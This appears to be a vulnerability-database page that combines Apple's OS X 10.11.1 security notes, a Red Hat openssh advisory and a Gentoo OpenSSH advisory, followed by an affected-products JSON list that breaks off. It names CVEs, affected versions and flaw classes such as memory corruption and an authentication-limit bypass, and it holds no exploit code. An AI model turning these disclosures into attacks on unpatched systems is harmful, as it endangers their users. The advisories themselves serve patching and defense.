CFNetwork Available for: OS X El Capitan 10.11 Impact: Visiting a maliciously crafted website may lead to cookies being overwritten Description: A parsing issue existed when handling cookies with different letter casing. This issue was addressed through improved parsing. CVE-ID CVE-2015-7023 : Marvin Scholz; Xiaofeng Zheng and Jinjin Liang of Tsinghua University, Jian Jiang of University of California, Berkeley, Haixin Duan of Tsinghua University and International Computer Science Institute, Shuo Chen of Microsoft Research Redmond, Tao Wan of Huawei Canada, Nicholas Weaver of International Computer Science Institute and University of California, Berkeley, coordinated via CERT/CC
configd Available for: OS X El Capitan 10.11 Impact: A malicious application may be able to elevate privileges Description: A heap based buffer overflow issue existed in the DNS client library. CVE-ID CVE-2015-7015 : PanguTeam
CoreGraphics Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: Multiple memory corruption issues existed in CoreGraphics. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5925 : Apple CVE-2015-5926 : Apple
CoreText Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-6992 : John Villamil (@day6reak), Yahoo Pentest Team
CoreText Available for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-6975 : John Villamil (@day6reak), Yahoo Pentest Team
CoreText Available for: OS X El Capitan 10.11 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-7017 : John Villamil (@day6reak), Yahoo Pentest Team
CoreText Available for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-5944 : John Villamil (@day6reak), Yahoo Pentest Team
Disk Images Available for: OS X El Capitan 10.11 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in the parsing of disk images. This issue was addressed through improved memory handling. CVE-ID CVE-2015-6995 : Ian Beer of Google Project Zero
EFI Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: An attacker can exercise unused EFI functions Description: An issue existed with EFI argument handling. This was addressed by removing the affected functions. CVE-ID CVE-2015-7035 : Corey Kallenberg, Xeno Kovah, John Butterworth, and Sam Cornwell of The MITRE Corporation, coordinated via CERT/CC
File Bookmark Available for: OS X El Capitan 10.11 Impact: Browsing to a folder with malformed bookmarks may cause unexpected application termination Description: An input validation issue existed in parsing bookmark metadata. This issue was addressed through improved validation checks. CVE-ID CVE-2015-6987 : Luca Todesco (@qwertyoruiop)
FontParser Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-5927 : Apple CVE-2015-5942 CVE-2015-6976 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-6977 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-6978 : Jaanus Kp, Clarified Security, working with HP's Zero Day Initiative CVE-2015-6991 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-6993 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-7009 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-7010 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-7018 : John Villamil (@day6reak), Yahoo Pentest Team
FontParser Available for: OS X El Capitan 10.11 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the handling of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-6990 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-7008 : John Villamil (@day6reak), Yahoo Pentest Team
Grand Central Dispatch Available for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11 Impact: Processing a maliciously crafted package may lead to arbitrary code execution Description: A memory corruption issue existed in the handling of dispatch calls. This issue was addressed through improved memory handling. CVE-ID CVE-2015-6989 : Apple
Graphics Drivers Available for: OS X El Capitan 10.11 Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: Multiple out of bounds read issues existed in the NVIDIA graphics driver. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-7019 : Ian Beer of Google Project Zero CVE-2015-7020 : Moony Li of Trend Micro
Graphics Drivers Available for: OS X El Capitan 10.11 Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-7021 : Moony Li of Trend Micro
ImageIO Available for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5 Impact: Processing a maliciously crafted image file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the parsing of image metadata. These issues were addressed through improved metadata validation. CVE-ID CVE-2015-5935 : Apple CVE-2015-5938 : Apple
ImageIO Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Processing a maliciously crafted image file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the parsing of image metadata. These issues were addressed through improved metadata validation. CVE-ID CVE-2015-5936 : Apple CVE-2015-5937 : Apple CVE-2015-5939 : Apple
IOAcceleratorFamily Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in IOAcceleratorFamily. This issue was addressed through improved memory handling. CVE-ID CVE-2015-6996 : Ian Beer of Google Project Zero
IOHIDFamily Available for: OS X El Capitan 10.11 Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-6974 : Luca Todesco (@qwertyoruiop)
Kernel Available for: OS X Yosemite v10.10.5 Impact: A local user may be able to execute arbitrary code with system privileges Description: A type confusion issue existed in the validation of Mach tasks. This issue was addressed through improved Mach task validation. CVE-ID CVE-2015-5932 : Luca Todesco (@qwertyoruiop), Filippo Bigarella
Kernel Available for: OS X El Capitan 10.11 Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: An uninitialized memory issue existed in the kernel. This issue was addressed through improved memory initialization. CVE-ID CVE-2015-6988 : The Brainy Code Scanner (m00nbsd)
Kernel Available for: OS X El Capitan 10.11 Impact: A local application may be able to cause a denial of service Description: An issue existed when reusing virtual memory. This issue was addressed through improved validation. CVE-ID CVE-2015-6994 : Mark Mentovai of Google Inc.
libarchive Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: A malicious application may be able to overwrite arbitrary files Description: An issue existed within the path validation logic for symlinks. This issue was addressed through improved path sanitization. CVE-ID CVE-2015-6984 : Christopher Crone of Infinit, Jonathan Schleifer
MCX Application Restrictions Available for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11 Impact: A developer-signed executable may acquire restricted entitlements Description: An entitlement validation issue existed in Managed Configuration. A developer-signed app could bypass restrictions on use of restricted entitlements and elevate privileges. This issue was addressed through improved provisioning profile validation. CVE-ID CVE-2015-7016 : Apple
Net-SNMP Available for: OS X El Capitan 10.11 Impact: An attacker in a privileged network position may be able to cause a denial of service Description: Multiple issues existed in netsnmp version 5.6. These issues were addressed by using patches affecting OS X from upstream. CVE-ID CVE-2012-6151 CVE-2014-3565
OpenGL Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5, and OS X El Capitan 10.11 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A memory corruption issue existed in OpenGL. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5924 : Apple
OpenSSH Available for: OS X El Capitan 10.11 Impact: A local user may be able to conduct impersonation attacks Description: A privilege separation issue existed in PAM support. This issue was addressed with improved authorization checks. CVE-ID CVE-2015-6563 : Moritz Jodeit of Blue Frost Security GmbH
Sandbox Available for: OS X El Capitan 10.11 Impact: A local user may be able to execute arbitrary code with kernel privileges Description: An input validation issue existed when handling NVRAM parameters. This issue was addressed through improved validation. CVE-ID CVE-2015-5945 : Rich Trouton (@rtrouton), Howard Hughes Medical Institute, Apple
Script Editor Available for: OS X El Capitan 10.11 Impact: An attacker may trick a user into running arbitrary AppleScript Description: In some circumstances, Script Editor did not ask for user confirmation before executing AppleScripts. This issue was addressed by prompting for user confirmation before executing AppleScripts. CVE-ID CVE-2015-7007 : Joe Vennix of Rapid7
Security Available for: OS X El Capitan 10.11 Impact: A malicious application may be able to overwrite arbitrary files Description: A double free issue existed in the handling of AtomicBufferedFile descriptors. This issue was addressed through improved validation of AtomicBufferedFile descriptors. CVE-ID CVE-2015-6983 : David Benjamin, Greg Kerr, Mark Mentovai and Sergey Ulanov from the Chrome Team
SecurityAgent Available for: OS X El Capitan 10.11 Impact: A malicious application can programmatically control keychain access prompts Description: A method existed for applications to create synthetic clicks on keychain prompts. This was addressed by disabling synthetic clicks for keychain access windows. CVE-ID CVE-2015-5943
Installation note:
OS X El Capitan v10.11.1 includes the security content of Safari 9.0.1: https://support.apple.com/kb/HT205377
OS X El Capitan 10.11.1 and Security Update 2015-007 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Comment: GPGTools - http://gpgtools.org
iQIcBAEBCAAGBQJWJuKsAAoJEBcWfLTuOo7t8e0P/igVHKDXeLNib2eEzbS2BMVV Ee968BgEDw1xnHK8zzh3bbRNxxAUT9lwe8RuSYECfp8sUYySb51/VIWpmidewsqB az7mJ4Gohldppejc5tykHDoTYesQL7iySLn74PdxZfZXbtz2EGJK19cA6hIHcO5x ZiMCbJzTaAOylKRQRRi3kMdNWEzxbtm90247vNx/zMSjs1bhGlQbJsCVDmX/Q9uH Xja9aPCHDfaQueTw5idbXwT+Y/+I9ytBlL5JXVrjRUDYCtuewC4DNsQxZY0qcDyE A7/0G7iYW5vOECNhpoLA0+1MbdHxJXhwJtmIKX8zucYqe/Vr4j41oGey/HJW55ER USJ2RBpMtGhDEolyvxz7FlSPYOIpp05mwMB0GWQWAmkWDAxnagkQm9xwKBMt4eq4 CNdI0YaX0iPPWYIkI3HpZHdzuwbE5b053cw1hLKc0OVQBiqLUQxe3W5s64ZqTSe0 whlm9lt/9EUwyfXHEiXTYi/d+CF8+JthY4ieXRJ4mwz77udafmgA5Pbl71SqB8pE 7TBByuCOFdou6JmdJPahLDxoGRA+i7Z+a8Myn4WtbemkjrO9iZ/VsdAdl/Db+7cz rEgSPjelEC5z5WxQspiuohxU1NkDnMgWm2Tnx+pFBOfZMheE4xnTfve3vqY+gQdN 4GbuRXld4PbxeDdel0Nk =snJ4 -----END PGP SIGNATURE----- . 6) - i386, x86_64
Security Fix(es):
-
It was found that the OpenSSH client did not properly enforce the ForwardX11Timeout setting. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2015-6564)
-
An access flaw was discovered in OpenSSH; the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssh security, bug fix, and enhancement update Advisory ID: RHSA-2015:2088-06 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2088.html Issue date: 2015-11-19 CVE Names: CVE-2015-5600 CVE-2015-6563 CVE-2015-6564 =====================================================================
- Summary:
Updated openssh packages that fix multiple security issues, several bugs, and add various enhancements are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server.
A flaw was found in the way OpenSSH handled PAM authentication when using privilege separation. An attacker with valid credentials on the system and able to fully compromise a non-privileged pre-authentication process using a different flaw could use this flaw to authenticate as other users. (CVE-2015-6563)
A use-after-free flaw was found in OpenSSH. (CVE-2015-6564)
It was discovered that the OpenSSH sshd daemon did not check the list of keyboard-interactive authentication methods for duplicates. A remote attacker could use this flaw to bypass the MaxAuthTries limit, making it easier to perform password guessing attacks. (CVE-2015-5600)
It was found that the OpenSSH ssh-agent, a program to hold private keys used for public key authentication, was vulnerable to password guessing attacks. An attacker able to connect to the agent could use this flaw to conduct a brute-force attack to unlock keys in the ssh-agent. (BZ#1238238)
This update fixes the following bugs:
-
Previously, the sshd_config(5) man page was misleading and could thus confuse the user. This update improves the man page text to clearly describe the AllowGroups feature. (BZ#1150007)
-
The limit for the function for restricting the number of files listed using the wildcard character (*) that prevents the Denial of Service (DoS) for both server and client was previously set too low. Consequently, the user reaching the limit was prevented from listing a directory with a large number of files over Secure File Transfer Protocol (SFTP). This update increases the aforementioned limit, thus fixing this bug. (BZ#1160377)
-
When the ForceCommand option with a pseudoterminal was used and the MaxSession option was set to "2", multiplexed SSH connections did not work as expected. After the user attempted to open a second multiplexed connection, the attempt failed if the first connection was still open. This update modifies OpenSSH to issue only one audit message per session, and the user is thus able to open two multiplexed connections in this situation. (BZ#1199112)
-
The ssh-copy-id utility failed if the account on the remote server did not use an sh-like shell. Remote commands have been modified to run in an sh-like shell, and ssh-copy-id now works also with non-sh-like shells. (BZ#1201758)
-
Due to a race condition between auditing messages and answers when using ControlMaster multiplexing, one session in the shared connection randomly and unexpectedly exited the connection. This update fixes the race condition in the auditing code, and multiplexing connections now work as expected even with a number of sessions created at once. (BZ#1240613)
In addition, this update adds the following enhancements:
-
As not all Lightweight Directory Access Protocol (LDAP) servers possess a default schema, as expected by the ssh-ldap-helper program, this update provides the user with an ability to adjust the LDAP query to get public keys from servers with a different schema, while the default functionality stays untouched. (BZ#1201753)
-
With this enhancement update, the administrator is able to set permissions for files uploaded using Secure File Transfer Protocol (SFTP). (BZ#1197989)
-
This update provides the LDAP schema in LDAP Data Interchange Format (LDIF) format as a complement to the old schema previously accepted by OpenLDAP. (BZ#1184938)
-
With this update, the user can selectively disable the Generic Security Services API (GSSAPI) key exchange algorithms as any normal key exchange. (BZ#1253062)
Users of openssh are advised to upgrade to these updated packages, which correct these issues and add these enhancements.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1125110 - pam_namespace usage is not consistent across system-wide PAM configuration 1160377 - sftp is failing using wildcards and many files 1178116 - Default selinux policy prevents ssh-ldap-helper from connecting to LDAP server 1181591 - No Documentation= line in the sshd.service file 1184938 - Provide LDIF version of LPK schema 1187597 - sshd -T does not show all (default) options, inconsistency 1197666 - ssh client using HostbasedAuthentication aborts in FIPS mode 1197989 - RFE: option to let openssh/sftp force the exact permissions on newly uploaded files 1238238 - openssh: weakness of agent locking (ssh-add -x) to password guessing 1245969 - CVE-2015-5600 openssh: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices 1252844 - CVE-2015-6563 openssh: Privilege separation weakness related to PAM support 1252852 - CVE-2015-6564 openssh: Use-after-free bug related to PAM support
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: openssh-6.6.1p1-22.el7.src.rpm
x86_64: openssh-6.6.1p1-22.el7.x86_64.rpm openssh-askpass-6.6.1p1-22.el7.x86_64.rpm openssh-clients-6.6.1p1-22.el7.x86_64.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-keycat-6.6.1p1-22.el7.x86_64.rpm openssh-server-6.6.1p1-22.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssh-debuginfo-6.6.1p1-22.el7.i686.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-ldap-6.6.1p1-22.el7.x86_64.rpm openssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssh-6.6.1p1-22.el7.src.rpm
x86_64: openssh-6.6.1p1-22.el7.x86_64.rpm openssh-clients-6.6.1p1-22.el7.x86_64.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-keycat-6.6.1p1-22.el7.x86_64.rpm openssh-server-6.6.1p1-22.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssh-askpass-6.6.1p1-22.el7.x86_64.rpm openssh-debuginfo-6.6.1p1-22.el7.i686.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-ldap-6.6.1p1-22.el7.x86_64.rpm openssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssh-6.6.1p1-22.el7.src.rpm
aarch64: openssh-6.6.1p1-22.el7.aarch64.rpm openssh-clients-6.6.1p1-22.el7.aarch64.rpm openssh-debuginfo-6.6.1p1-22.el7.aarch64.rpm openssh-keycat-6.6.1p1-22.el7.aarch64.rpm openssh-server-6.6.1p1-22.el7.aarch64.rpm
ppc64: openssh-6.6.1p1-22.el7.ppc64.rpm openssh-askpass-6.6.1p1-22.el7.ppc64.rpm openssh-clients-6.6.1p1-22.el7.ppc64.rpm openssh-debuginfo-6.6.1p1-22.el7.ppc64.rpm openssh-keycat-6.6.1p1-22.el7.ppc64.rpm openssh-server-6.6.1p1-22.el7.ppc64.rpm
ppc64le: openssh-6.6.1p1-22.el7.ppc64le.rpm openssh-askpass-6.6.1p1-22.el7.ppc64le.rpm openssh-clients-6.6.1p1-22.el7.ppc64le.rpm openssh-debuginfo-6.6.1p1-22.el7.ppc64le.rpm openssh-keycat-6.6.1p1-22.el7.ppc64le.rpm openssh-server-6.6.1p1-22.el7.ppc64le.rpm
s390x: openssh-6.6.1p1-22.el7.s390x.rpm openssh-askpass-6.6.1p1-22.el7.s390x.rpm openssh-clients-6.6.1p1-22.el7.s390x.rpm openssh-debuginfo-6.6.1p1-22.el7.s390x.rpm openssh-keycat-6.6.1p1-22.el7.s390x.rpm openssh-server-6.6.1p1-22.el7.s390x.rpm
x86_64: openssh-6.6.1p1-22.el7.x86_64.rpm openssh-askpass-6.6.1p1-22.el7.x86_64.rpm openssh-clients-6.6.1p1-22.el7.x86_64.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-keycat-6.6.1p1-22.el7.x86_64.rpm openssh-server-6.6.1p1-22.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64: openssh-askpass-6.6.1p1-22.el7.aarch64.rpm openssh-debuginfo-6.6.1p1-22.el7.aarch64.rpm openssh-ldap-6.6.1p1-22.el7.aarch64.rpm openssh-server-sysvinit-6.6.1p1-22.el7.aarch64.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.aarch64.rpm
ppc64: openssh-debuginfo-6.6.1p1-22.el7.ppc.rpm openssh-debuginfo-6.6.1p1-22.el7.ppc64.rpm openssh-ldap-6.6.1p1-22.el7.ppc64.rpm openssh-server-sysvinit-6.6.1p1-22.el7.ppc64.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.ppc.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.ppc64.rpm
ppc64le: openssh-debuginfo-6.6.1p1-22.el7.ppc64le.rpm openssh-ldap-6.6.1p1-22.el7.ppc64le.rpm openssh-server-sysvinit-6.6.1p1-22.el7.ppc64le.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.ppc64le.rpm
s390x: openssh-debuginfo-6.6.1p1-22.el7.s390.rpm openssh-debuginfo-6.6.1p1-22.el7.s390x.rpm openssh-ldap-6.6.1p1-22.el7.s390x.rpm openssh-server-sysvinit-6.6.1p1-22.el7.s390x.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.s390.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.s390x.rpm
x86_64: openssh-debuginfo-6.6.1p1-22.el7.i686.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-ldap-6.6.1p1-22.el7.x86_64.rpm openssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssh-6.6.1p1-22.el7.src.rpm
x86_64: openssh-6.6.1p1-22.el7.x86_64.rpm openssh-askpass-6.6.1p1-22.el7.x86_64.rpm openssh-clients-6.6.1p1-22.el7.x86_64.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-keycat-6.6.1p1-22.el7.x86_64.rpm openssh-server-6.6.1p1-22.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssh-debuginfo-6.6.1p1-22.el7.i686.rpm openssh-debuginfo-6.6.1p1-22.el7.x86_64.rpm openssh-ldap-6.6.1p1-22.el7.x86_64.rpm openssh-server-sysvinit-6.6.1p1-22.el7.x86_64.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.i686.rpm pam_ssh_agent_auth-0.9.3-9.22.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-5600 https://access.redhat.com/security/cve/CVE-2015-6563 https://access.redhat.com/security/cve/CVE-2015-6564 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFWTj/BXlSAg2UNWIIRAgIEAJ4+Nlu4NsYtiDloNVrVn2F/vT/9kACdEHqE h3XwDOy3+OSs/h1DEpVBtV0= =x/s+ -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201512-04
https://security.gentoo.org/
Severity: Normal Title: OpenSSH: Multiple vulnerabilities Date: December 20, 2015 Bugs: #553724, #555518, #557340 ID: 201512-04
Synopsis
Multiple vulnerabilities have been found in OpenSSH, the worst of which could lead to arbitrary code execution, or cause a Denial of Service condition. Please review the CVE identifiers referenced below for details.
Impact
Workaround
There is no known workaround at this time.
Resolution
All OpenSSH users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/openssh-6.9_p1-r2"
References
[ 1 ] CVE-2015-5352 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5352 [ 2 ] CVE-2015-5600 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5600 [ 3 ] CVE-2015-6563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6563 [ 4 ] CVE-2015-6564 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6564 [ 5 ] CVE-2015-6565 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6565
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201512-04
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201508-0112", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "mac os x", "scope": "lte", "trust": 1.0, "vendor": "apple", "version": "10.11.0" }, { "model": "openssh", "scope": "lte", "trust": 1.0, "vendor": "openbsd", "version": "6.9" }, { "model": "openssh", "scope": "lt", "trust": 0.8, "vendor": "openbsd", "version": "7.0" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.11" }, { "model": "mac os x", "scope": "eq", "trust": 0.6, "vendor": "apple", "version": "10.11.0" }, { "model": "nsmexpress", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "nsm3000", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.3" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.0.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3.0.0" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.09" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.211" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "6.5" }, { "model": "openssh", "scope": "eq", "trust": 0.3, "vendor": "openssh", "version": "5.2" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.08" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.214" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "1.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "smartcloud entry fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.19" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 